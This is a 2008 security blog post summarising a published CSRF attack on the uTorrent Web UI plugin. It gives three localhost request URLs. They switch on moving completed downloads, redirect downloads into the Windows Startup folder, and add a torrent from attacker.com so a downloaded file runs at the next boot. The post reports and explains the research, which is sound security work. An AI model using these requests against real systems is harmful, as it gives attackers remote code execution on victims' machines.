Sections
Personal tools
You are here: Home people rd Archive 2008 May 07 Own a box via CSRF
« October 2008 »
Su Mo Tu We Th Fr Sa
      1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31  
Archives
Topics
Topics in Detail…
Tag cloud
Cryptography Firewall Laws Misc Mobile Security Physical Security Politics Reverse Engineering Rootkits Vulnerabilities Web Security
 
Document Actions

Own a box via CSRF

by rd last modified 2008-05-09 05:18
Filed Under:

You get bored of CSRF issues every day? Now this is one is a bit more interesting


Rob Carter has posted a blog on how to pwn a box via a pure CSRF bug of a uTorrent plugin. When a user installs the uTorrent Web UI plugin, the plugin starts a locally running web server on your machine. Basically, his CSRF exploit force uTorrent to move completed downloads to an arbitrary directory on their system, download arbitrary torrents, and completely own their box. 


  • The first CSRF to turn on the “Move completed downloads” option on the uTorrent Web UI. http://localhost:14774/gui/?action=setsetting&s=dir_completed_download_flag&v=1


  • The second CSRF to change the path of where the completed torrent download is placed. For example:
    http://localhost:14774/gui/?action=setsetting&s=dir_completed_download&v=C:\
    Documents%20and%20Settings\All%20Users\Start%20Menu\Programs\Startup


  • The last CSRF is to force the victim to download a torrent which points to an attacker controlled file. Once the file is downloaded via torrent, uTorrent places the files into startup folder and automatically run the file in the next windows boot.
    http://localhost:14774/gui/?action=add-url&s=http://www.attacker.com/file.torrent
Blog Author
rd
Location:
rd
 
Recent Comments
No comments posted yet.
Syndication
Atom
RDF
RSS 2.0
 
Powered by Plone CMS, the Open Source Content Management System